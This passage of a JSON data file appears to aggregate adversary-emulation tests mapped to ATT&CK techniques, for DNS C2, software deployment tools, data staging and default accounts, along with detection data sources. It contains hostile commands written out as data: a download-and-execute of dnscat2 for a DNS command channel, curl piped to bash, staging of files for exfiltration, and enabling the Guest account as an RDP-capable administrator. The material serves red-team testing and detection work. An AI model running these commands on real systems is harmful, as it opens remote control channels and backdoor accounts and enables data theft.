(should be 63 characters to test maximum length)", + "type": "String", + "default": "atomicredteamatomicredteamatomicredteamatomicredteamatomicredte" + }, + "domain": { + "description": "Default domain to simulate against", + "type": "String", + "default": "127.0.0.1.xip.io" + } + }, + "executor": { + "command": "Set-Location PathToAtomicsFolder\n.\\T1071.004\\src\\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "name": "powershell" + } + }, + { + "name": "DNS C2", + "auto_generated_guid": "e7bf9802-2e78-4db9-93b5-181b7bcd37d7", + "description": "This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.\nThe following blogs have more information.\n\nhttps://github.com/iagox86/dnscat2\n\nhttps://github.com/lukebaggett/dnscat2-powershell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Domain Name configured to use DNS Server where your C2 listener is running", + "type": "String", + "default": "example.com" + }, + "server_ip": { + "description": "IP address of DNS server where your C2 listener is running", + "type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')\nStart-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1072", + "command_list": [ + "\"#{radmin_exe}\"", + "\"%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe\"" + ], + "commands": [ + { + "command": "\"#{radmin_exe}\"", + "source": "atomics/T1072/T1072.yaml", + "name": "Atomic Red Team Test - Software Deployment Tools" + }, + { + "command": "\"%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe\"", + "source": "atomics/T1072/T1072.yaml", + "name": "Atomic Red Team Test - Software Deployment Tools" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1072", + "display_name": "Software Deployment Tools", + "atomic_tests": [ + { + "name": "Radmin Viewer Utility", + "auto_generated_guid": "b4988cad-6ed2-434d-ace5-ea2670782129", + "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "radmin_installer": { + "description": "Radmin Viewer installer", + "type": "Path", + "default": "%TEMP%\\RadminViewer.msi" + }, + "radmin_exe": { + "description": "The radmin.exe executable from RadminViewer.msi", + "type": "Path", + "default": "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe" + } + }, + "dependencies": [ + { + "description": "Radmin Viewer Utility must be installed at specified location (#{radmin_exe})\n", + "prereq_command": "if not exist \"#{radmin_exe}\" (exit /b 1)\n", + "get_prereq_command": "echo Downloading radmin installer\nbitsadmin /transfer myDownloadJob /download /priority normal \"https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi\" #{radmin_installer}\nmsiexec /i \"#{radmin_installer}\" /qn\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "\"#{radmin_exe}\"" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Binary file metadata" + ], + [ + "Third-party application logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4663", + "File monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "LOG-MD B9", + "Binary file metadata" + ], + [ + "Third-party application logs" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + "http://www.secureworks.com/resources/blog/living-off-the-land/", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1074.001", + "command_list": [ + "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat\" -OutFile $env:TEMP\\discovery.bat\n", + "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > /tmp/T1074.001_discovery.log\n", + "Compress-Archive -Path #{input_file} -DestinationPath $env:TEMP\\Folder_to_zip.zip -Force\n", + "Compress-Archive -Path PathToAtomicsFolder\\T1074.001\\bin\\Folder_to_zip -DestinationPath #{output_file} -Force\n", + "cp \"#{host.file.path[filters(technique=T1005,max=3)]}\" #{host.dir.staged[filters(max=1)]}\n", + "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", + "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", + "mkdir -p staged && echo $PWD/staged\n", + "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n" + ], + "commands": [ + { + "command": "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat\" -OutFile $env:TEMP\\discovery.bat\n", + "source": "atomics/T1074.001/T1074.001.yaml", + "name": "Atomic Red Team Test - Data Staged: Local Data Staging" + }, + { + "command": "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > /tmp/T1074.001_discovery.log\n", + "source": "atomics/T1074.001/T1074.001.yaml", + "name": "Atomic Red Team Test - Data Staged: Local Data Staging" + }, + { + "command": "Compress-Archive -Path #{input_file} -DestinationPath $env:TEMP\\Folder_to_zip.zip -Force\n", + "source": "atomics/T1074.001/T1074.001.yaml", + "name": "Atomic Red Team Test - Data Staged: Local Data Staging" + }, + { + "command": "Compress-Archive -Path PathToAtomicsFolder\\T1074.001\\bin\\Folder_to_zip -DestinationPath #{output_file} -Force\n", + "source": "atomics/T1074.001/T1074.001.yaml", + "name": "Atomic Red Team Test - Data Staged: Local Data Staging" + }, + { + "command": "cp \"#{host.file.path[filters(technique=T1005,max=3)]}\" #{host.dir.staged[filters(max=1)]}\n", + "source": "data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml", + "name": "copy files to staging directory" + }, + { + "command": "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", + "source": "data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml", + "name": "copy files to staging directory" + }, + { + "command": "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n", + "source": "data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml", + "name": "copy files to staging directory" + }, + { + "command": "mkdir -p staged && echo $PWD/staged\n", + "source": "data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml", + "name": "create a directory for exfil staging" + }, + { + "command": "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n", + "source": "data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml", + "name": "create a directory for exfil staging" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1074.001", + "display_name": "Data Staged: Local Data Staging", + "atomic_tests": [ + { + "name": "Stage data from Discovery.bat", + "auto_generated_guid": "107706a5-6f9f-451a-adae-bab8c667829f", + "description": "Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,\nverify that the file is saved in the temp directory.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Location to save downloaded discovery.bat file", + "type": "Path", + "default": "$env:TEMP\\discovery.bat" + } + }, + "executor": { + "command": "Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat\" -OutFile #{output_file}\n", + "cleanup_command": "Remove-Item -Force #{output_file} -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Stage data from Discovery.sh", + "auto_generated_guid": "39ce0303-ae16-4b9e-bb5b-4f53e8262066", + "description": "Utilize curl to download discovery.sh and execute a basic information gathering shell script\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Location to save downloaded discovery.bat file", + "type": "Path", + "default": "/tmp/T1074.001_discovery.log" + } + }, + "executor": { + "command": "curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file}\n", + "name": "bash" + } + }, + { + "name": "Zip a Folder with PowerShell for Staging in Temp", + "auto_generated_guid": "a57fbe4b-3440-452a-88a7-943531ac872a", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip\nwas placed in the temp directory.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Location to save zipped file or folder", + "type": "Path", + "default": "$env:TEMP\\Folder_to_zip.zip" + }, + "input_file": { + "description": "Location of file or folder to zip", + "type": "Path", + "default": "PathToAtomicsFolder\\T1074.001\\bin\\Folder_to_zip" + } + }, + "executor": { + "command": "Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force\n", + "cleanup_command": "Remove-Item -Path #{output_file} -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + }, + { + "id": "4e97e699-93d7-4040-b5a3-2e906a58199e", + "name": "Stage sensitive files", + "description": "copy files to staging directory", + "tactic": "collection", + "technique": { + "attack_id": "T1074.001", + "name": "Data Staged: Local Data Staging" + }, + "platforms": { + "darwin": { + "sh": { + "command": "cp \"#{host.file.path[filters(technique=T1005,max=3)]}\" #{host.dir.staged[filters(max=1)]}\n" + } + }, + "linux": { + "sh": { + "command": "cp \"#{host.file.path[filters(technique=T1005,max=3)]}\" #{host.dir.staged[filters(max=1)]}\n" + } + }, + "windows": { + "psh": { + "command": "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n" + }, + "cmd": { + "command": "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.file.path" + } + ] + }, + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + }, + { + "id": "6469befa-748a-4b9c-a96d-f191fde47d89", + "name": "Create staging directory", + "description": "create a directory for exfil staging", + "tactic": "collection", + "technique": { + "attack_id": "T1074.001", + "name": "Data Staged: Local Data Staging" + }, + "platforms": { + "darwin": { + "sh": { + "command": "mkdir -p staged && echo $PWD/staged\n", + "cleanup": "rm -rf staged\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.staged" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "mkdir -p staged && echo $PWD/staged\n", + "cleanup": "rm -rf staged\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.staged" + } + ] + } + } + }, + "windows": { + "psh,pwsh": { + "command": "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n", + "cleanup": "Remove-Item -Path \"staged\" -recurse\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.staged" + } + ] + } + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1078.001", + "command_list": [ + "net user guest /active:yes\nnet user guest #{guest_password}\nnet localgroup #{local_admin_group} guest /add\nnet localgroup \"#{remote_desktop_users_group_name}\" guest /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "net user #{guest_user} /active:yes\nnet user #{guest_user} Password123!\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup Administrators #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"Remote Desktop Users\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + null, + "net user guest /active:yes\n" + ], + "commands": [ + { + "command": "net user guest /active:yes\nnet user guest #{guest_password}\nnet localgroup #{local_admin_group} guest /add\nnet localgroup \"#{remote_desktop_users_group_name}\" guest /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": "net user #{guest_user} /active:yes\nnet user #{guest_user} Password123!\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup Administrators #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"Remote Desktop Users\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": null, + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + }, + { + "command": "net user guest /active:yes\n", + "source": "atomics/T1078.001/T1078.001.yaml", + "name": "Atomic Red Team Test - Valid Accounts: Default Accounts" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1078.001", + "display_name": "Valid Accounts: Default Accounts", + "atomic_tests": [ + { + "name": "Enable Guest account with RDP capability and admin privileges", + "auto_generated_guid": "99747561-ed8d-47f2-9c91-1e5fde1ed6e0", + "description": "After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,\nand desktop will allow multiple RDP connections.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "guest_user": { + "description": "Specify the guest account", + "type": "String", + "default": "guest" + }, + "guest_password": { + "description": "Specify the guest password", + "type": "String", + "default": "Password123!" + }, + "local_admin_group": { + "description": "Specify the admin localgroup name", + "type": "String", + "default": "Administrators" + }, + "remote_desktop_users_group_name": { + "description": "Specify the remote desktop users group name", + "type": "String", + "default": "Remote Desktop Users" + }, + "remove_rdp_access_during_cleanup": { + "description": "Set to 1 if you want the cleanup to remove RDP access to machine", + "type": "Integer", + "default": 0 + } + }, + "executor": { + "command": "net user #{guest_user} /active:yes\nnet user #{guest_user} #{guest_password}\nnet localgroup #{local_admin_group} #{guest_user} /add\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /add\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /t REG_DWORD /d 0x1 /f", + "cleanup_command": "net user #{guest_user} /active:no >nul 2>&1\nnet localgroup #{local_admin_group} #{guest_user} /delete >nul 2>&1\nnet localgroup \"#{remote_desktop_users_group_name}\" #{guest_user} /delete >nul 2>&1\nif #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)\nif #{remove_rdp_access_during_cleanup} EQU 1 (reg delete \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /f >nul 2>&1)\nif #{remove_rdp_access_during_cleanup} EQU 1 (reg delete \"hklm\\system\\CurrentControlSet\\Control\\Terminal Server\" /v \"AllowTSConnections\" /f >nul 2>&1)", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Activate Guest Account", + "auto_generated_guid": "aa6cb8c4-b582-4f8e-b677-37733914abda", + "description": "The Adversaries can activate the default Guest user. The guest account is inactivated by default\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "guest_user": { + "description": "Specify the guest account", + "type": "String", + "default": "guest" + } + }, + "executor": { + "command": "net user #{guest_user} /active:yes\n", + "cleanup_command": "net user #{guest_user} /active:no\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + 